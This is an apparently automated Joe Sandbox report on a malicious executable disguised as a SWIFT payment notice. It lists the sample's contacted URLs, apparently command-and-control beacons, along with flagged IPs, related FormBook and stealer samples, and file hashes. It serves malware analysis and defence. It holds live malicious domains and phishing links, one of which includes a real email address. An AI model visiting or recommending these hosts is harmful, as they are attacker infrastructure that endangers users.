http://www.ebook.farm/rzaq/	true	Avira URL Cloud: safe	unknown
http://www.futurevision.life/cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM	true	Avira URL Cloud: safe	unknown
http://www.qiusuo.vip/6yjb/?mRu=VYNzRxyQK7JD7ZohbYVagv51ruE2l0awbhfoJPQ4rqLtN/pKU1ruR3BE6r+8vb9gac3NpWXxvYS6rs+3SUr3GMlMxkDr3AnCXH8/Zbk4o49navQqKFljaLg=&UJ=7H1XM	true	Avira URL Cloud: safe	unknown
http://www.makerpay.xyz/lp9q/?mRu=Tgs0l5rQdINE0HmohrfgPmtVT9TM6mRmz28qlq5N+W6TIOOkclTpEHygPFllR64ZyPP4U6P7xjaKPMS0ZS1/tTAw9ro2DSZN0V3b+mDHt47uSUTeFI2WDZw=&UJ=7H1XM	true	Avira URL Cloud: safe	unknown
http://www.rimberiokitchen.online/xvf3/	true	Avira URL Cloud: safe	unknown
http://www.econsultoria.online/cbd3/	true	Avira URL Cloud: safe	unknown
http://www.smartbuyoffer.online/fid8/?mRu=TlJ1g/LEHcod8cWOxAq9FP73H09YVH7WgnCIHnyD26ULKZOEEsjMueNmMu+sImVaRLKPh0l5mf17vNoqkS6RVPulxmIy09RerMB73PEzvxMXDGvmWRP6LAE=&UJ=7H1XM	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmp, c104-9J-L.12.dr	false		high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	DevicePairingWizard.exe, 0000000C.00000002.5057040263.00000000077E0000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmp, c104-9J-L.12.dr	false		high
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
https://dts.gnpge.com	nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	c104-9J-L.12.dr	false		high
http://www.rimberiokitchen.online/Bathroom_Remodeling_Tips.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8up	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/pics/28903/search.png)	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.rimberiokitchen.online/Bathroom_Design_Ideas.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8upcAI	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rimberiokitchen.online/__media__/design/underconstructionnotice.php?d=rimberiokitchen.onl	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000620C000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.0000000006530000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.00000000066C2000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000005022000.00000004.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000004E90000.00000004.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000004B6C000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.rimberiokitchen.online/Kitchen_Remodeling.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8upcAIRhX	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	DevicePairingWizard.exe, 0000000C.00000002.5057040263.00000000077E0000.00000004.00000020.00020000.00000000.sdmp, c104-9J-L.12.dr	false		high
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.econsultoria.online	nmlZZxePqIALDF.exe, 0000000D.00000002.5958070475.0000000001519000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rimberiokitchen.online/sk-logabpstatus.php?a=L1N3WXcvTG4rbTFUeWgzcExCUXZVOTUzaFVabnBmQkpi	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/pics/29590/bg1.png)	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	c104-9J-L.12.dr	false		high
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	c104-9J-L.12.dr	false		high
http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.rimberiokitchen.online/px.js?ch=2	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.rimberiokitchen.online/px.js?ch=1	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hostgator.com.br	DevicePairingWizard.exe, 0000000C.00000002.5055513570.0000000005EE8000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000004848000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rimberiokitchen.online/sk-logabpstatus.php?a=TEdQajRwbU5mNWR3d0VHeGk1WjViUVdIYjZ3dUM5K0NC	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/js/min.js?v2.3	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.rimberiokitchen.online/__media__/js/trademark.php?d=rimberiokitchen.online&type=ns	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.Rimberiokitchen.online	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.rimberiokitchen.online/Bathroom_Cabinets.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8upcAIRhXu	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rimberiokitchen.online/Kitchen_Products.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8upcAIRhXuJ	DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
47.52.221.8	www.wukong.college	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
206.119.81.121	zz83x.top	United States	174	COGENT-174US	true
13.248.169.48	www.makerpay.xyz	United States	16509	AMAZON-02US	true
154.38.64.6	www.qiusuo.vip	United States	174	COGENT-174US	true
203.161.49.193	www.futurevision.life	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
108.179.252.152	smartbuyoffer.online	United States	46606	UNIFIEDLAYER-AS-1US	true
173.255.194.134	www.jigg.space	United States	63949	LINODE-APLinodeLLCUS	true
199.59.243.227	www.jiujiuxi.love	United States	395082	BODIS-NJUS	false
84.32.84.32	pg874.shop	Lithuania	33922	NTT-LT-ASLT	true
208.91.197.27	www.rimberiokitchen.online	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
3.33.130.190	econsultoria.online	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1554464
Start date and time:	2024-11-12 15:26:24 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 16m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@17/11
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 96% Number of executed functions: 45 Number of non-executed functions: 287
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, SgrmBroker.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
Execution Graph export aborted for target nmlZZxePqIALDF.exe, PID 6696 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Simulations

Behavior and APIs

Time	Type	Description
09:30:12	API Interceptor	24362115x Sleep call for process: DevicePairingWizard.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
47.52.221.8	RFQ.exe	Get hash	malicious	FormBook	Browse	www.wukong.college/9ezc/
	RFQ.exe	Get hash	malicious	FormBook	Browse	www.wukong.college/9ezc/
	XhAQ0Rk63O.exe	Get hash	malicious	FormBook	Browse	www.wukong.college/9ezc/
13.248.169.48	Order.exe	Get hash	malicious	FormBook	Browse	www.sonoscan.org/ew98/
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	www.ipk.app/phav/
	RN# D7521-RN-00353 REV-2.exe	Get hash	malicious	FormBook	Browse	www.hopeisa.live/v0jl/
	8dPlV2lT8o.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
	7ObLFE2iMK.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
	UMwpXhA46R.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
	1fWgBXPgiT.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
	arxtPs1STE.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
	Z8eHwAvqAh.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
	WlCVLbzNph.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
77980.bodis.com	RFQ.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	8dPlV2lT8o.exe	Get hash	malicious	Simda Stealer	Browse	199.59.243.227
	7ObLFE2iMK.exe	Get hash	malicious	Simda Stealer	Browse	199.59.243.227
	UMwpXhA46R.exe	Get hash	malicious	Simda Stealer	Browse	199.59.243.227
	1fWgBXPgiT.exe	Get hash	malicious	Simda Stealer	Browse	199.59.243.227
	arxtPs1STE.exe	Get hash	malicious	Simda Stealer	Browse	199.59.243.227
	Z8eHwAvqAh.exe	Get hash	malicious	Simda Stealer	Browse	199.59.243.227
	WlCVLbzNph.exe	Get hash	malicious	Simda Stealer	Browse	199.59.243.227
	Bpfz752pYZ.exe	Get hash	malicious	Simda Stealer	Browse	199.59.243.227
www.jigg.space	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	96.126.123.244
www.jigg.space	MV Sunshine.exe	Get hash	malicious	FormBook	Browse	45.33.30.197
www.wukong.college	RFQ.exe	Get hash	malicious	FormBook	Browse	47.52.221.8
	RFQ.exe	Get hash	malicious	FormBook	Browse	47.52.221.8
	XhAQ0Rk63O.exe	Get hash	malicious	FormBook	Browse	47.52.221.8
www.futurevision.life	Shipping documents..exe	Get hash	malicious	FormBook	Browse	203.161.49.193
www.futurevision.life	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	203.161.49.193

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COGENT-174US	Order.exe	Get hash	malicious	FormBook	Browse	38.47.232.194
	inter.exe	Get hash	malicious	Unknown	Browse	154.23.181.145
	bad.elf	Get hash	malicious	ConnectBack	Browse	154.7.177.151
	Selected_Items.vbs	Get hash	malicious	FormBook	Browse	38.14.34.5
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	206.119.185.141
	RN# D7521-RN-00353 REV-2.exe	Get hash	malicious	FormBook	Browse	154.23.181.7
	amen.mpsl.elf	Get hash	malicious	Mirai	Browse	38.3.124.75
	zgp.elf	Get hash	malicious	Mirai	Browse	38.93.218.3
	amen.sh4.elf	Get hash	malicious	Mirai	Browse	149.29.26.151
	amen.spc.elf	Get hash	malicious	Mirai	Browse	38.127.150.137
AMAZON-02US	Order.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.ca	Get hash	malicious	Captcha Phish	Browse	13.225.78.35
	https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.ca	Get hash	malicious	Captcha Phish	Browse	13.225.78.35
	https://cx.surveysensum.com/d6xqqwvx	Get hash	malicious	HTMLPhisher	Browse	3.5.146.47
	http://track.reviewmgr.com/ls/click?upn=u001.W5y-2Fhe84rCuLxXDO470nfuKD2Iz98QeQpE-2BkxRR0H-2BqB5cDKklujIJ5FLru7QrAASOSa17vR-2FSCLVAx4lWyy5Q-3D-3DkaP7_Yp4ydSxZWNatis3HtI6bBrJjg57JYwT6kbyY2f89Z-2FBhxNJZyCBl9w6yXNV0YfiKUAGjaILaAN0mF43Ydvv3aAXjCPBMrYvHXhqj-2F90M8IWSluK-2FDr0h4-2FIbAXpExZIWOjtRSKBCrpvm-2BHKZd6Q2itOPvvv8Wh8uHJq1rbQgzA8HMkQB3GP7mtgLvWqf-2F2SUC5eKSSwLqPZnnofRHoc7cSU1xfupfl4il6cb3-2BSKrTYe1odI0Jq1F3XJEtoagDhZ-2B0poPJjuweCyekPO2Y39xfy8FdwLLvVUma4NgVhDhlM-3D	Get hash	malicious	Unknown	Browse	13.224.189.101
	https://t.ly/SjDNX	Get hash	malicious	Python Stealer, Braodo	Browse	185.166.143.50
	2024101221359RemitanceAdvice..pdf	Get hash	malicious	HTMLPhisher	Browse	3.161.119.61
	https://customization-connect-7617.my.salesforce.com/sfc/p/d3000000Byor/a/d300000000RR/ML8ajzoJU6aJIvGQZGZ6S9rRHpaD1XaytKzcNGEf56g	Get hash	malicious	HTMLPhisher	Browse	18.245.175.114
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.244.18.122
	DEMASI-24-12B DOC. SCAN.exe	Get hash	malicious	GuLoader, Remcos	Browse	108.156.211.31
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	inter.exe	Get hash	malicious	Unknown	Browse	8.210.59.12
	RFQ.exe	Get hash	malicious	FormBook	Browse	47.242.89.146
	https://gerneva.com	Get hash	malicious	Unknown	Browse	47.251.24.229
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	147.139.148.16
	https://canadapost.postescanadry.xyz/ca	Get hash	malicious	Unknown	Browse	47.251.115.90
	s-white-82333.js	Get hash	malicious	Unknown	Browse	8.209.119.17
	s-white-82333.js	Get hash	malicious	Unknown	Browse	8.209.119.17
	7sugT5Gudk.exe	Get hash	malicious	Unknown	Browse	47.240.68.28
	arm7.elf	Get hash	malicious	Mirai	Browse	8.208.73.228
	RFQ.exe	Get hash	malicious	FormBook	Browse	47.242.89.146
COGENT-174US	Order.exe	Get hash	malicious	FormBook	Browse	38.47.232.194
	inter.exe	Get hash	malicious	Unknown	Browse	154.23.181.145
	bad.elf	Get hash	malicious	ConnectBack	Browse	154.7.177.151
	Selected_Items.vbs	Get hash	malicious	FormBook	Browse	38.14.34.5
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	206.119.185.141
	RN# D7521-RN-00353 REV-2.exe	Get hash	malicious	FormBook	Browse	154.23.181.7
	amen.mpsl.elf	Get hash	malicious	Mirai	Browse	38.3.124.75
	zgp.elf	Get hash	malicious	Mirai	Browse	38.93.218.3
	amen.sh4.elf	Get hash	malicious	Mirai	Browse	149.29.26.151
	amen.spc.elf	Get hash	malicious	Mirai	Browse	38.127.150.137

Process:	C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	288768
Entropy (8bit):	7.993605473546579
Encrypted:	true
SSDEEP:	6144:AL5RYGU/ftTE5MgXnYQv32UtAWZwilTlM8PenU2tuE+lUJQju:SAtwn9v3POZwJ/PoduEUUJT
MD5:	98557C3094525C0F2AFA6BDE0897E724
SHA1:	76EBCEDF4C7B3A07205DD2CC7C21BE88D29575E1
SHA-256:	C95A780F71F323D6E47BF294052D0078E8F8F9CB4669274230B5231F81B24F4A
